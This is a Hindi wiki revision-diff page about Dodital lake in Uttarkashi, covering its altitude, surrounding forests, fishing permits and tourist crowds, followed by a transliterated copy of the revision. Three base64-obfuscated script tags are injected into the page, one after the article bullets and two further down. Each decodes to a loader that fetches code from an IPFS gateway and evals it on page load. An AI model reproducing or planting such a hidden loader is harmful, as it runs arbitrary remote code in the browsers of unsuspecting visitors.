Difference between revisions of "दोदीताल उत्तरकाशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m
 
Line 1: Line 1:
*[[उत्तरकाशी]] में यह ताल समुद्र तल से 3307 मीटर की ऊँचाई पर स्थित है।  
+
[[चित्र:Dodi-Tal-4.jpg|thumb|दोदीताल, [[उत्तरकाशी]]]]
*यह ताल चारों तरफ से घने जंगलों से घिरा हुआ है।  
+
'''दोदीताल''' [[उत्तरकाशी]] में की एक ताल है जो समुद्र तल से 3307 मीटर की ऊँचाई पर स्थित है।  
*इस ताल में [[मछली]] मारने के लिए मंडल वन अधिकारी, उत्तरकाशी से अनुमति लेनी होती है।
+
*दोदीताल चारों तरफ से घने जंगलों से घिरा हुआ है।  
*यहाँ पर्यटकों की हमेशा भीड़ लगी रहती है।  
+
*दोदीताल में [[मछली]] मारने के लिए मंडल वन अधिकारी, उत्तरकाशी से अनुमति लेनी होती है।
{{प्रचार}}
+
*दोदीताल पर पर्यटकों की हमेशा भीड़ लगी रहती है।  
 +
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 11: Line 12:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Dodi-Tal-1.jpg|दोदीताल, [[उत्तरकाशी]]
 +
चित्र:Dodi-Tal-2.jpg|दोदीताल, [[उत्तरकाशी]]
 +
चित्र:Dodi-Tal-3.jpg|दोदीताल, [[उत्तरकाशी]]
 +
चित्र:Dodi-Tal.jpg|दोदीताल, [[उत्तरकाशी]]
 +
</gallery>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{उत्तराखंड के पर्यटन स्थल}}
 
{{उत्तराखंड के पर्यटन स्थल}}
 
 
[[Category:उत्तराखंड]][[Category:उत्तराखंड_के_पर्यटन_स्थल]][[Category:उत्तरकाशी के पर्यटन स्थल]][[Category:पर्यटन कोश]]__INDEX__
 
[[Category:उत्तराखंड]][[Category:उत्तराखंड_के_पर्यटन_स्थल]][[Category:उत्तरकाशी के पर्यटन स्थल]][[Category:पर्यटन कोश]]__INDEX__

Latest revision as of 05:38, 1 February 2012

[[chitr:Dodi-Tal-4.jpg|thumb|dodital, uttarakashi]] dodital uttarakashi mean ki ek tal hai jo samudr tal se 3307 mitar ki ooanchaee par sthit hai.

  • dodital charoan taraph se ghane jangaloan se ghira hua hai.
  • dodital mean machhali marane ke lie mandal van adhikari, uttarakashi se anumati leni hoti hai.
  • dodital par paryatakoan ki hamesha bhi d lagi rahati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>